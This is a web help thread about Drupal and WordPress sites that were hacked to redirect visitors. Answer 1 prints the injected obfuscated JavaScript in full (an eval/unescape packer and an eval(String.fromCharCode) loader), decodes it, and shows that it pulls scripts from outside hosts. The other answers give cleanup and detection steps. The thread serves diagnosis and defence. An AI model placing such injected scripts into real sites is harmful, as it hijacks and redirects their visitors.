My sites have been hacked by cpamatik.com , it passes all security checks with Google and Sucuri, but still redirects, any idea?

Question

Almost all my sites got hacked by cpamatik.com virus

All CMS were up to date, plugins, modules etc..(Drupal and Wordpress) , some sites I have logged in to work on, but some sites I haven't touched in months, so the hack wasn't inadvertendly inserted from me login in.

My PC is scanned and clean, actually reformated 2 weeks ago.

Hack sites behavior is a redirect on home page and links.

Site in question are:

wearelao.com xuzo.com easyrconbar.com and many others...

Security scan on my Namecheap.com hosting spitted this out:

----------- SCAN REPORT -----------
TimeStamp: Tue, 11 Sep 2018 14:20:06 -0400
(/usr/sbin/cxs --nobayes --clamdsock /var/clamd --dbreport --defapache nobody --doptions Mv --exploitscan --nofallback --filemax 50000 --noforce --html --ignore /etc/cxs/cxs.ignore.manual --options mMOLfSGchexdnwZDRru --qoptions Mv --report /home/bruneiab/scanreport-bruneiab-Sep_11_2018_14h20m.txt --sizemax 1000000 --ssl --summary --sversionscan --timemax 30 --unofficial --user bruneiab --virusscan --xtra /etc/cxs/cxs.xtra.manual)

Scanning /home/bruneiab:

'/home/bruneiab/access-logs'
# Symlink to [/usr/local/apache/domlogs/bruneiab]

'/home/bruneiab/.nc_plugin/hidden'
# World writeable directory

'/home/bruneiab/.softaculous/installations.php'
# Universal decode regex match = [universal decoder]

'/home/bruneiab/.trash/civicrm/vendor/phpseclib/phpseclib/phpseclib/Net/SFTP.php'
# Regular expression match = [symlink\s*\(]

'/home/bruneiab/.trash/civicrm/vendor/symfony/filesystem/Symfony/Component/Filesystem/Filesystem.php'
# Regular expression match = [symlink\s*\(]   and more...

Hosting company have been on this for 24 hours, but the can't seem to be able to fix it...

Answer 1

I found these javascript on the compromised sites.

<script type="text/javascript" async="" src="https://ads.voipnewswire.net/ad.js"></script>

<script type="text/javascript"><![CDATA[eval(unescape("eval%28function%28p%2Ca%2Cc%2Ck%2Ce%2Cr%29%7Be%3Dfunction%28c%29%7Breturn%28c%3Ca%3F%27%27%3Ae%28parseInt%28c/a%29%29%29+%28%28c%3Dc%25a%29%3E35%3FString.fromCharCode%28c+29%29%3Ac.toString%2836%29%29%7D%3Bif%28%21%27%27.replace%28/%5E/%2CString%29%29%7Bwhile%28c--%29r%5Be%28c%29%5D%3Dk%5Bc%5D%7C%7Ce%28c%29%3Bk%3D%5Bfunction%28e%29%7Breturn%20r%5Be%5D%7D%5D%3Be%3Dfunction%28%29%7Breturn%27%5C%5Cw+%27%7D%3Bc%3D1%7D%3Bwhile%28c--%29if%28k%5Bc%5D%29p%3Dp.replace%28new%20RegExp%28%27%5C%5Cb%27+e%28c%29+%27%5C%5Cb%27%2C%27g%27%29%2Ck%5Bc%5D%29%3Breturn%20p%7D%28%276%207%28a%2Cb%29%7Bn%7B4%282.9%29%7B3%20c%3D2.9%28%22o%22%29%3Bc.p%28b%2Cf%2Cf%29%3Ba.q%28c%29%7Dg%7B3%20c%3D2.r%28%29%3Ba.s%28%5C%27t%5C%27+b%2Cc%29%7D%7Du%28e%29%7B%7D%7D6%20h%28a%29%7B4%28a.8%29a%3Da.8%3B4%28a%3D%3D%5C%27%5C%27%29v%3B3%20b%3Da.w%28%5C%27%7C%5C%27%29%5B1%5D%3B3%20c%3B3%20d%3D2.x%28%5C%27y%5C%27%29%3Bz%283%20i%3D0%3Bi%3Cd.5%3Bi++%294%28d%5Bi%5D.A%3D%3D%5C%27B-C-D%5C%27%29c%3Dd%5Bi%5D%3B4%282.j%28%5C%27k%5C%27%29%3D%3DE%7C%7C2.j%28%5C%27k%5C%27%29.l.5%3D%3D0%7C%7Cc.5%3D%3D0%7C%7Cc.l.5%3D%3D0%29%7BF%286%28%29%7Bh%28a%29%7D%2CG%29%7Dg%7Bc.8%3Db%3B7%28c%2C%5C%27m%5C%27%29%3B7%28c%2C%5C%27m%5C%27%29%7D%7D%27%2C43%2C43%2C%27%7C%7Cdocument%7Cvar%7Cif%7Clength%7Cfunction%7CGTranslateFireEvent%7Cvalue%7CcreateEvent%7C%7C%7C%7C%7C%7Ctrue%7Celse%7CdoGTranslate%7C%7CgetElementById%7Cgoogle_translate_element2%7CinnerHTML%7Cchange%7Ctry%7CHTMLEvents%7CinitEvent%7CdispatchEvent%7CcreateEventObject%7CfireEvent%7Con%7Ccatch%7Creturn%7Csplit%7CgetElementsByTagName%7Cselect%7Cfor%7CclassName%7Cgoog%7Cte%7Ccombo%7Cnull%7CsetTimeout%7C500%27.split%28%27%7C%27%29%2C0%2C%7B%7D%29%29"))/* ]]> */</script>

<script language=javascript>eval(String.fromCharCode(118, 97, 114, 32, 101, 108, 101, 109, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 101, 108, 101, 109, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 101, 108, 101, 109, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 101, 108, 101, 109, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 49, 49, 53, 44, 32, 52, 54, 44, 32, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 57, 55, 44, 32, 49, 48, 48, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 49, 56, 44, 32, 49, 49, 49, 44, 32, 49, 48, 53, 44, 32, 49, 49, 50, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 57, 44, 32, 49, 49, 53, 44, 32, 49, 49, 57, 44, 32, 49, 48, 53, 44, 32, 49, 49, 52, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 101, 108, 101, 109, 41, 59, 32, 125));</script>

The last one translates to

var elem = document.createElement('script');
elem.type = 'text/javascript';
elem.async = true;
elem.src = 'https://ads.voipnewswire.net/ad.js';
var alls = document.getElementsByTagName('script');
var nt3 = true;
for (var i = alls.length; i--;) {
    if (alls[i].src.indexOf('voipnewswire') > -1) {
        nt3 = false;
    }
}
if (nt3 == true) {
    document.getElementsByTagName("head")[0].appendChild(elem);
}

The ad.js is

var _paq = _paq || [];
_paq.push(['trackPageView']);
_paq.push(['enableLinkTracking']);
var u="https://voipnewswire.innocraft.cloud/";
_paq.push(['setTrackerUrl', u+'piwik.php']);
_paq.push(['setSiteId', '1']);
var d=document, g=d.createElement('script'), 
s=d.getElementsByTagName('script')[0];
g.type='text/javascript'; g.async=true; g.defer=true; g.src=u+'piwik.js'; 
s.parentNode.insertBefore(g,s);
var cloudscr = document.createElement('script'); cloudscr.type = 'text/javascript'; cloudscr.src = https://glasssunshine.cf/glcf.js; cloudscr.async = true; document.getElementsByTagName("head")[0].appendChild(cloudscr);

Which ultimately leads to ads and tracking javascript, https://voipnewswire.innocraft.cloud/piwik.js

These codes are the problem. You can delete these from the templates of your CMSes.

But I would strongly recommend to just back everything up and start from the clean slate because I suspect that your server/hosting provider is compromised or in control of the attacker.

Answer 2

Just to @Moonsik Park answer : You can use Browser developer mode redirect log preservation features to locate which script do the redirect.

• In Google developer mode, it is a "Preserve log" checkbox under network
• In firefox developer mode, it is a "Persist Logs"checkbox under network

Take the compromised xuzo.com as example, open the website in browser developer mode and the log presrevation enabled, you can see something like following before it jump to another website

https://ads.voipnewswire.net/ad.js  initiator is 
http://xuzo.com/sites/default/files/js/js_5yveJEfYnvdHe_DxshzrVq3ttzeNp-8Ai8MVx1bt2eo.js

Open the file, you will see something like this in the header

eval(String.fromCharCode(118, 97, 114, 32, 10....

Unfortunately, String.fromCharCode is legitimate Javascript code and frequently used by many website to hide info such as email address from spammer. I doubt security software can use String.fromCharCode as a reason to locate the bad code without generate a lot of false alarm.

However, if you never use such code, a simple fgrep will help you locate the files, e.g.

fgrep -lR 'fromCharCode' '/path/to/cms/'

Answer 3

I had the same problem a few days ago. More than 15 sites were affected. I installed the "Better Search and Replace" plugin to search for the specific javascript. Then I removed the code (using the replace function) and it seemed to do the job. However, I'm investigating how "they" succeeded in injecting the code.